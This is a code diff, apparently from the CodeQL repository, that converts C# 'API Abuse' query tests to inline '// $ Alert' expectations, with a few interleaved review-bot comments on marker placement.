diff --git a/csharp/ql/test/library-tests/statements/PrintAst.qlref b/csharp/ql/test/library-tests/statements/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/statements/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/statements/PrintAst.qlref
@@ -1 +1 @@
-shared/PrintAst.ql
\ No newline at end of file
+query: shared/PrintAst.ql
diff --git a/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref b/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref
index f867dd01f9f8..1db66182b0ab 100644
--- a/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref
+++ b/csharp/ql/test/library-tests/stringinterpolation/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/types/PrintAst.qlref b/csharp/ql/test/library-tests/types/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/types/PrintAst.qlref +++ b/csharp/ql/test/library-tests/types/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/unsafe/PrintAst.qlref b/csharp/ql/test/library-tests/unsafe/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/unsafe/PrintAst.qlref +++ b/csharp/ql/test/library-tests/unsafe/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref index ca6961e370bf..c911197abb35 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref +++ b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollect.qlref @@ -1 +1,2 @@ -API Abuse/CallToGCCollect.ql \ No newline at end of file +query: API Abuse/CallToGCCollect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs index acc30b87c8d9..b081d201f10d 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/CallToGCCollect/CallToGCCollectBad.cs @@ -4,6 +4,6 @@ class Bad { void M() { - GC.Collect(); + GC.Collect(); // $ Alert } } 
diff --git a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs index c546c406f310..ea0ffeeb7645 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs +++ b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.cs @@ -16,7 +16,7 @@ static void NotObsoleteMethod() static void Main(string[] args) { // BAD: Call to obsolete method - ObsoleteMethod(); + ObsoleteMethod(); // $ Alert // GOOD: Call to non-obsolete method NotObsoleteMethod(); diff --git a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref index 08b2c9a51d4e..028fb010e8ef 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref +++ b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethod.qlref @@ -1 +1,2 @@ -API Abuse/CallToObsoleteMethod.ql \ No newline at end of file +query: API Abuse/CallToObsoleteMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs index c8c10de283d5..9ea4f5b80a44 100644 --- a/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/CallToObsoleteMethod/CallToObsoleteMethodBad.cs @@ -4,7 +4,7 @@ class Bad { void M() { - Logger.Log("Hello, World!"); + Logger.Log("Hello, World!"); // $ Alert } static class Logger diff --git a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs index a2e5f7333e9e..865b31f2ca07 100644 
--- a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs +++ b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.cs @@ -1,7 +1,7 @@ using System; // BAD -class Incorrect +class Incorrect // $ Alert { public static bool operator ==(Incorrect a, Incorrect b) => default(bool); public static bool operator !=(Incorrect a, Incorrect b) => !(a == b); @@ -21,7 +21,7 @@ class Correct } // BAD: needs to redefine Equals -class IncorrectOverrides : Correct +class IncorrectOverrides : Correct // $ Alert { public static bool operator ==(IncorrectOverrides a, IncorrectOverrides b) => default(bool); public static bool operator !=(IncorrectOverrides a, IncorrectOverrides b) => !(a == b); @@ -47,7 +47,7 @@ static void Main(string[] args) } // BAD: should also implement Equals. -class MyEquatable : IEquatable +class MyEquatable : IEquatable // $ Alert { public bool Equals(MyEquatable other) { diff --git a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref index 5ffe8a70dec4..9b025e76c304 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref +++ b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEquals.qlref @@ -1 +1,2 @@ -API Abuse/ClassDoesNotImplementEquals.ql \ No newline at end of file +query: API Abuse/ClassDoesNotImplementEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs index 619f462a96c8..305bd87c2cf8 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs 
+++ b/csharp/ql/test/query-tests/API Abuse/ClassDoesNotImplementEquals/ClassDoesNotImplementEqualsBad.cs @@ -21,7 +21,7 @@ public override bool Equals(object obj) } } - class GasolineCar : Car + class GasolineCar : Car // $ Alert { protected bool unleaded; diff --git a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref index e597d142a2d1..65eb6ca729d1 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref +++ b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneable.qlref @@ -1 +1,2 @@ -API Abuse/ClassImplementsICloneable.ql \ No newline at end of file +query: API Abuse/ClassImplementsICloneable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs index 0999bd87d281..e1636158bf2f 100644 --- a/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/ClassImplementsICloneable/ClassImplementsICloneableBad.cs @@ -8,7 +8,7 @@ class Thing public Thing(int i) { I = i; } } - class Shallow : ICloneable + class Shallow : ICloneable // $ Alert { public Thing T { get; set; } public Shallow(Thing t) { T = t; } @@ -17,7 +17,7 @@ class Shallow : ICloneable public object Clone() { return new Shallow(T); } } - class Deep : ICloneable + class Deep : ICloneable // $ Alert { public Thing T { get; set; } public Deep(Thing t) { T = t; } 
diff --git a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs index acde0fc477f7..31505eb740c6 100644 --- a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs +++ b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.cs @@ -45,17 +45,17 @@ public void Method() // BAD: No Dispose call in case of exception SqlConnection c1d = new SqlConnection(); c1d.Open(); - c1d.Dispose(); + c1d.Dispose(); // $ Alert // BAD: No Dispose call in case of exception SqlConnection c1e = new SqlConnection(); Throw1(c1e); - c1e.Dispose(); + c1e.Dispose(); // $ Alert // BAD: No Dispose call in case of exception SqlConnection c1f = new SqlConnection(); Throw2(c1f); - c1f.Dispose(); + c1f.Dispose(); // $ Alert // GOOD: using declaration using SqlConnection c2 = new SqlConnection(""); diff --git a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref index d55f9b7dcba7..4273ca0a55c6 100644 --- a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref +++ b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnException.qlref @@ -1 +1,2 @@ -API Abuse/DisposeNotCalledOnException.ql \ No newline at end of file +query: API Abuse/DisposeNotCalledOnException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs index c0674285bba1..22827a1e3d03 100644 
--- a/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/DisposeNotCalledOnException/DisposeNotCalledOnExceptionBad.cs @@ -11,8 +11,8 @@ public SqlDataReader GetAllCustomers() var cmd = new SqlCommand("SELECT * FROM Customers", conn); var ret = cmd.ExecuteReader(); - cmd.Dispose(); - conn.Dispose(); + cmd.Dispose(); // $ Alert + conn.Dispose(); // $ Alert return ret; } diff --git a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs index 8e8b8f8430b3..f05764f99c55 100644 --- a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs +++ b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.cs @@ -1,6 +1,6 @@ using System; -class ClassMissingGetHashCode +class ClassMissingGetHashCode // $ Alert { public override bool Equals(object other) { @@ -13,7 +13,7 @@ public override bool Equals(object other) } } -class ClassMissingEquals +class ClassMissingEquals // $ Alert { public new bool Equals(object other) { // not overridden diff --git a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref index 6425e440f739..26171a4ca75d 100644 --- a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref +++ b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCode.qlref @@ -1 +1,2 @@ -API Abuse/InconsistentEqualsGetHashCode.ql \ No newline at end of file +query: API Abuse/InconsistentEqualsGetHashCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs index 6b3b95966dc9..00da432846f3 100644 --- a/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/InconsistentEqualsGetHashCode/InconsistentEqualsGetHashCodeBad.cs @@ -1,6 +1,6 @@ using System; -class Bad +class Bad // $ Alert { private int id; diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs index 5b5780ed9778..5e566b926814 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.cs @@ -2,7 +2,7 @@ class C1 { - public int CompareTo(T other) => throw null; // BAD + public int CompareTo(T other) => throw null; // BAD // $ Alert } class C2 { } diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref index 23abf6ab339d..afab98e27ce5 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignature.qlref @@ -1 +1,2 @@ -API Abuse/IncorrectCompareToSignature.ql \ No newline at end of file +query: API Abuse/IncorrectCompareToSignature.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
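Review bot: In the `CompareTo` hunk of IncorrectCompareToSignature.cs the expectation is appended behind an existing remark, giving `// BAD // $ Alert`, so `$` is no longer the first token of the comment. Whether the inline-expectations post-processor accepts that order is not visible from this patch; if it expects the comment to begin with `$`, the marker would be read as plain text and the alert reported as unexpected, so this is worth confirming against the test run. Writing the line as `public int CompareTo(T other) => throw null; // $ Alert // BAD` keeps the marker first and the remark as a trailing comment. The three `Equals(null)` lines in the NullArgumentToEquals.cs hunk use the same `// BAD // $ Alert` order.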
diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs index efeb55ce65bc..33b1e3ad8d45 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectCompareToSignature/IncorrectCompareToSignatureBad.cs @@ -2,5 +2,5 @@ class Bad { - public int CompareTo(Bad b) => 0; + public int CompareTo(Bad b) => 0; // $ Alert } diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs index effb17a558a2..f858cc35a0fc 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.cs @@ -3,7 +3,7 @@ // BAD class Incorrect { - public bool Equals(Incorrect other) => false; + public bool Equals(Incorrect other) => false; // $ Alert } // GOOD diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref index f56496da8be1..c05a5f0af8d0 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignature.qlref @@ -1 +1,2 @@ -API Abuse/IncorrectEqualsSignature.ql \ No newline at end of file +query: API Abuse/IncorrectEqualsSignature.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs index 723110d1de11..7b03d029eb8a 100644 --- a/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/IncorrectEqualsSignature/IncorrectEqualsSignatureBad.cs @@ -9,6 +9,6 @@ public Bad(int Id) this.id = Id; } - public bool Equals(Bad b) => + public bool Equals(Bad b) => // $ Alert this.id == b.id; } diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs index dd069476b1bb..b71c2f2a5c93 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.cs @@ -20,7 +20,7 @@ class C1 : IDisposable C1 Field1; // GOOD C1 Field2; // BAD - public virtual void Dispose() + public virtual void Dispose() // $ Alert { Field1.Dispose(); } @@ -31,7 +31,7 @@ class C2 : C1 C1 Field1; // GOOD C1 Field2; // BAD - public override void Dispose() + public override void Dispose() // $ Alert { base.Dispose(); Field1.Dispose(); @@ -49,7 +49,7 @@ class C5 : C4 C1 Field1; // GOOD C1 Field2; // BAD - public override void Dispose(bool disposing) + public override void Dispose(bool disposing) // $ Alert { base.Dispose(disposing); if (disposing) @@ -64,7 +64,7 @@ class C6 : Component C1 Field1; // GOOD C1 Field2; // BAD - protected override void Dispose(bool disposing) + protected override void Dispose(bool disposing) // $ Alert { base.Dispose(disposing); if (disposing) diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref index a1d172302306..442cf4780c15 100644 
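Review bot: The `// $ Alert` markers in MissingDisposeCall.cs are placed on the `Dispose` declarations while the existing `// BAD` remarks stay on the `Field2` declarations, so the file no longer says which field each expected alert is about. A short trailing remark on the annotated line would tie the two together, for example `public virtual void Dispose() // $ Alert // Field2 is not disposed`. This applies to all four hunks of the file (`C1`, `C2`, `C5`, `C6`); only the `C1` body is fully visible here, the other `Dispose` bodies continue outside their hunks, so the wording for those should be checked against the full file.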
--- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCall.qlref @@ -1 +1,2 @@ -API Abuse/MissingDisposeCall.ql \ No newline at end of file +query: API Abuse/MissingDisposeCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs index 6386abc84003..ed3a1851c87f 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeCall/MissingDisposeCallBad.cs @@ -6,7 +6,7 @@ class Bad : IDisposable private FileStream stream1 = new FileStream("a.txt", FileMode.Open); private FileStream stream2 = new FileStream("b.txt", FileMode.Open); - public void Dispose() + public void Dispose() // $ Alert { stream1.Dispose(); } diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs index 1e71bba55eb2..998bc757cd55 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.cs @@ -25,7 +25,7 @@ public virtual void Dispose() } } -class C2 : C1 +class C2 : C1 // $ Alert { C2 Field; // BAD } @@ -41,13 +41,13 @@ public override void Dispose() } } -class WebPage : Page +class WebPage : Page // $ Alert { C1 Field1; // BAD Control Field2; // GOOD } -class WebControl : Control +class WebControl : Control // $ Alert { C1 Field1; // BAD Control Field2; // GOOD @@ -73,12 +73,12 @@ public override void Dispose(bool disposing) } } -class C6 : C4 +class C6 : C4 // $ Alert { C2 Field; // BAD } -class C7 : Component +class C7 : Component // $ Alert { C2 Field; // BAD } 
@@ -97,7 +97,7 @@ protected override void Dispose(bool disposing) } } -class C9 : C1 +class C9 : C1 // $ Alert { C2 Field; // BAD diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref index 61be6bbcf704..d9cb769bef36 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethod.qlref @@ -1 +1,2 @@ -API Abuse/MissingDisposeMethod.ql \ No newline at end of file +query: API Abuse/MissingDisposeMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs index db8067735cfb..5cc9d68d7fae 100644 --- a/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/MissingDisposeMethod/MissingDisposeMethodBad.cs @@ -11,7 +11,7 @@ public virtual void Dispose() } } -class Bad : BadBase +class Bad : BadBase // $ Alert { private FileStream stream2 = new FileStream("b.txt", FileMode.Open); } diff --git a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs index b2cb30b17ada..a35d0d0b51a5 100644 --- a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs +++ b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.cs 
@@ -12,13 +12,13 @@ class C1 class C2 : C1 { // BAD: M1 does not override C1.M1 - public int M1() { return 1; } + public int M1() { return 1; } // $ Alert // GOOD: M2 overrides using the explicit keyword "override" public override int M2() { return 2; } // BAD: M3 does not override C1.M3 - public IEnumerable M3() { return null; } + public IEnumerable M3() { return null; } // $ Alert // GOOD: M4 overrides using the explicit keyword "override" public override IEnumerable M4() { return null; } diff --git a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref index fb31441316c0..7fe57a6c15cb 100644 --- a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref +++ b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethod.qlref @@ -1 +1,2 @@ -API Abuse/NonOverridingMethod.ql \ No newline at end of file +query: API Abuse/NonOverridingMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs index cb76d9ab9947..8641dd60fbe7 100644 --- a/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/NonOverridingMethod/NonOverridingMethodBad.cs @@ -7,6 +7,6 @@ public virtual void Foo() { } class Sub : Super { - public void Foo() { } + public void Foo() { } // $ Alert } } diff --git a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs index 08219f61a73e..674205965a93 100644 --- a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs +++ b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.cs 
@@ -3,16 +3,16 @@ class NullArgumentToEquals void M() { int i = 0; - i.Equals(null); // BAD + i.Equals(null); // BAD // $ Alert int? i2 = null; i2.Equals(null); // GOOD C c = null; - c.Equals(null); // BAD + c.Equals(null); // BAD // $ Alert object o = null; - o.Equals(null); // BAD + o.Equals(null); // BAD // $ Alert } class C diff --git a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref index c6b40febef05..12129a164b04 100644 --- a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref +++ b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEquals.qlref @@ -1 +1,2 @@ -API Abuse/NullArgumentToEquals.ql \ No newline at end of file +query: API Abuse/NullArgumentToEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs index 612aaa2b1ac6..932ced4ef4a2 100644 --- a/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/NullArgumentToEquals/NullArgumentToEqualsBad.cs @@ -1,4 +1,4 @@ class Bad { - bool IsNull(object o) => o.Equals(null); + bool IsNull(object o) => o.Equals(null); // $ Alert } diff --git a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs index cf290a84bcbb..837526eb236c 100644 --- a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs +++ b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.cs @@ -21,7 +21,7 @@ static void Main(string[] args) ret = intHashSet.Add(42); // BAD: - stringHashSet.Add("42"); + stringHashSet.Add("42"); // $ Alert } } 
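Review bot: The annotated lines in NullArgumentToEquals.cs now carry two markers that say the same thing, `i.Equals(null); // BAD // $ Alert`, and only the second one is checked by the test. The unchecked `// BAD` can drift from the checked marker on later edits, so I would keep one: `i.Equals(null); // $ Alert`, leaving `// GOOD` on the lines that must stay silent. The same doubled form is in UncheckedReturnValue.cs, LocalScopeVariableShadowsMember.cs, AbstractToConcreteCollection.cs, StaticArray.cs, Program.cs (ConfusingMethodNames), VariableNameTooShort.cs and VirtualCallInConstructorOrDestructor.cs. If both are kept on purpose for human readers, saying so once in the PR description would settle it.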
@@ -64,8 +64,8 @@ static void Main(string[] args) ret = s.Read(null, 0, 0); ret = s.Read(null, 0, 0); ret = s.Read(null, 0, 0); - s.Read(null, 0, 0); // always check - s.ReadByte(); // always check + s.Read(null, 0, 0); // always check // $ Alert + s.ReadByte(); // always check // $ Alert } } @@ -82,7 +82,7 @@ static void M() ret1 = M1(); ret1 = M1(); ret1 = M1(); - M1(); // BAD + M1(); // BAD // $ Alert M1(); // GOOD var ret2 = M2(); @@ -103,7 +103,7 @@ static void M() ret2 = M2(); ret2 = M2(); ret2 = M2(); - M2(); // BAD + M2(); // BAD // $ Alert var ret3 = M3(null); ret3 = M3(null); @@ -115,7 +115,7 @@ static void M() ret3 = M3(null); ret3 = M3(null); M3(null); // GOOD - M3(null); // BAD + M3(null); // BAD // $ Alert M3(null); // GOOD } diff --git a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref index ca9751d2857a..c04faa8008ad 100644 --- a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref +++ b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValue.qlref @@ -1 +1,2 @@ -API Abuse/UncheckedReturnValue.ql \ No newline at end of file +query: API Abuse/UncheckedReturnValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs index 394906e70241..6d9743172c29 100644 --- a/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs +++ b/csharp/ql/test/query-tests/API Abuse/UncheckedReturnValue/UncheckedReturnValueBad.cs 
